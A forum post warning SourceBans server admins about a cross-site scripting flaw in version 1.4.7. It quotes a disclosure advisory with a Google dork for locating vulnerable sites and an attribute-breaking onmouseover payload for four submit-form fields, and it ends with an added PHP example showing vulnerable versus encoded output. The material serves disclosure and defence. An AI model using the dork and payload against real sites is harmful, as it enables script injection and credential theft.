    SourceBans Vulnerability (XSS)


    cmer

    Hi,

     

    There is a vulnerability in SourceBans; to protect yourselves, please disable submitBan.

     

     

    # Exploit Title: SourceBans Version 1.4.7 XSS
    # Google Dork: inurl:"sourcebans/index.php?p=submit"
    # Date: Feb. 9th 2011
    # Author: Sw1tCh
    # Software Link: http://www.sourcebans.net/
    # Version: 1.4.7
    
    
    Info:
    SourceBans is an application for managing publicly the banned users for a Steam Server. 
    
    #-= The Advisory =-
    SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and/or a credentials loss.
    
    #-= Example =-
    
    http://<SITE>/sourcebans/index.php?p=submit
    
    - > BanIP => " onmouseover=prompt(928137) bad="
    - > Comments => " onmouseover=prompt(928137) bad="
    - > Name => " onmouseover=prompt(928137) bad="
    - > Email => " onmouseover=prompt(928137) bad="
    
    
    
    
    #Disclosure Information:
    - Vulnerability found and researched: January 18th 2011
    - Vendor (SourceBans) contacted: January 18th 2011
    [ Time Reduced because Ops of IRC channel were dicks ] 
    - Disclosed to Exploit-DB, Bugtraq and InterN0T: 
    
    
    
    
    
    #Credits: Sw1tCh
    
    #Shoutouts : gen0cide, Scruffy, Griff, D00dl3, 

     

    A patch should be released soon :)
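
Each value in the advisory starts with a double quote, which only has an effect if the form writes the submitted field back into a quoted HTML attribute without encoding it. The following is an added example, not SourceBans code and not part of the post or the advisory: it puts that output pattern beside the encoded form, and all function names in it are hypothetical.

```php
<?php
// Added illustration; not SourceBans code. All function names are hypothetical.

// Vulnerable pattern: the submitted value is written back into a double-quoted
// attribute unchanged, so a '"' inside the value ends the attribute early.
function render_input_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for the attribute context. ENT_QUOTES encodes both
// quote characters, so the value can no longer close the attribute.
function render_input_safe(string $name, string $value): string
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $enc($name) . '" value="' . $enc($value) . '">';
}

// Parse the rendered tag and list the attribute names a browser would see.
function attribute_names(string $html): array
{
    $doc = new DOMDocument();
    $doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Defence in depth: reject BanIP and Email values that are not well formed
// before they are stored or redisplayed. Free-text fields still need encoding.
function invalid_fields(array $form): array
{
    $bad = [];
    if (filter_var($form['BanIP'] ?? '', FILTER_VALIDATE_IP) === false) $bad[] = 'BanIP';
    if (filter_var($form['Email'] ?? '', FILTER_VALIDATE_EMAIL) === false) $bad[] = 'Email';
    return $bad;
}

// Value quoted in the advisory above, used here as the test input.
$value = '" onmouseover=prompt(928137) bad="';

echo implode(',', attribute_names(render_input_unsafe('Email', $value))), PHP_EOL;
echo implode(',', attribute_names(render_input_safe('Email', $value))), PHP_EOL;
echo implode(',', invalid_fields(['BanIP' => $value, 'Email' => $value])), PHP_EOL;
```

With the unencoded output the parsed tag gains an event-handler attribute in addition to type, name and value; with encoding the whole string stays inside value.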
